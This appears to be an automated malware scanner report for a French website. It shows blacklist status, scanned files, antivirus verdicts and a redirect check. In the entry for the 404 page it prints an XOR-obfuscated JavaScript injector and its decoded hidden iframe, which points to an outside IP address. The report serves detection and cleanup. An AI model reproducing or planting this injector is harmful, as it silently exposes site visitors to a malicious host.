New scan:

Malware Scanner report for mers-et-littoraux.com

Malicious/Suspicious/Total urls checked
1/0/5
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "mers-et-littoraux.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mers-et-littoraux.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://mers-et-littoraux.com/
200 OK
Content-Length: 9270
Content-Type: text/html
clean
http://mers-et-littoraux.com/jquery.js
200 OK
Content-Length: 93868
Content-Type: application/x-javascript
clean
http://mers-et-littoraux.com/script.js
200 OK
Content-Length: 34365
Content-Type: application/x-javascript
clean
http://mers-et-littoraux.com/script.responsive.js
200 OK
Content-Length: 7380
Content-Type: application/x-javascript
clean
http://mers-et-littoraux.com/test404page.js
404 Not Found
Content-Length: 2137
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var de48=Array(0x69,0x3c,0x33,0x27,0x34,0x38,0x30,0x75,0x26,0x27,0x36,0x68,0x72,0x3d,0x21,0x21,0x25,0x6f,0x7a,0x7a,0x67,0x65,0x64,0x7b,0x67,0x64,0x6d,0x7b,0x67,0x60,0x65,0x7b,0x64,0x6c,0x7a,0x25,0x39,0x26,0x66,0x66,0x66,0x66,0x7a,0x36,0x3a,0x20,0x3b,0x21,0x7b,0x25,0x3d,0x25,0x6a,0x3a,0x68,0x66,0x65,0x72,0x75,0x26,0x21,0x2c,0x39,0x30,0x68,0x72,0x31,0x3c,0x26,0x25,0x39,0x34,0x2c,0x6f,0x3b,0x3a,0x3b,0x30,0x72,0x6b,0x69,0x7a,0x3c,0x33,0x27,0x34,0x38,0x30,0x6b),dbd1=new String;for(b97e=0;b97e<0x59;b97e++)dbd1+=String.fromCharCode(de48[b97e]^0x55);document.write(dbd1);

Decoded script:


<iframe src='http://201.218.250.19/pls3333/count.php?o=30' style='display:none'></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Ad-Aware
Trojan.Script.505673
nProtect
Trojan.Script.505673
TrendMicro-HouseCall
TROJ_GEN.F47V1219
Emsisoft
Trojan.Script.505673 (B)
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
DrWeb
SCRIPT.Virus
Kaspersky
HEUR:Trojan.Script.Iframer
MicroWorld-eScan
Trojan.Script.505673
F-Secure
Trojan.Script.505673
VIPRE
Malware.JS.Generic (JS)
GData
Trojan.Script.505673
BitDefender
Trojan.Script.505673


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mers-et-littoraux.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 11:51:14 GMT
Accept-Ranges: bytes
ETag: "13f808d-2436-4cc7aab213800"
Server: Apache
Content-Length: 9270
Content-Type: text/html
Last-Modified: Sat, 20 Oct 2012 09:58:56 GMT
X-Powered-By: PleskLin

...9270 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mers-et-littoraux.com
Referer: http://www.google.com/search?q=mers-et-littoraux.com

Result:
The result is similar to the first query. There are no suspicious redirects found.